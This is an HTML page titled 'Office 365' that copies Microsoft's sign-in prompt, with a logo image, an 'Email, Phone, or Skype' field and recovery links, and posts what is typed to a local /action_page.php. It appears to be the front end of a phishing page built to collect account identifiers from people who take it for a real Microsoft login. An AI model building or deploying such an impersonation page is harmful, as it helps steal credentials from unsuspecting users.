 <!DOCTYPE html>
<html>
<head>
<title>Office 365</title>
<style>
body {
 background-color: #cccccc;
}
.homec{
 background-image: url("static/index.jpg");
	
	width:100%;
	height:100vh;
    display: flex;
     justify-contents:center;
     align-item:center;
	 display:flex;
	 justify-content:center;
	 align-items:center;
	
}
.form{
width:23rem;
min-width:18rem;
height:20rem;
background-color: #fff;
padding:2rem;
}

#fname{
width:100%;
height:2.5rem;
border-top:0;
border-right:0;
border-left:0;
padding-left:.5rem;
}
#button{
height:2rem;
width:8rem;
float:right;
}
a{
text-decoration:none;
color:gray;
}
</style>
</head>
<body>

<div class="homec">
<div class="form">
<img src="static/icon.png" alt="logo" />
<p><h3>Sign in<h3></p>
<form action="/action_page.php">
  <input type="text"  id="fname" name="fname" placeholder="Email, Phone, or Skype"/><br>
  <p>No account? <a href="/">create one</a></p>
  <p><a href="/">Can't access you account?</a></p>
  <input type="submit" id="button" value="Submit">
</form> 
</div>
</div>

</body>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
</html> 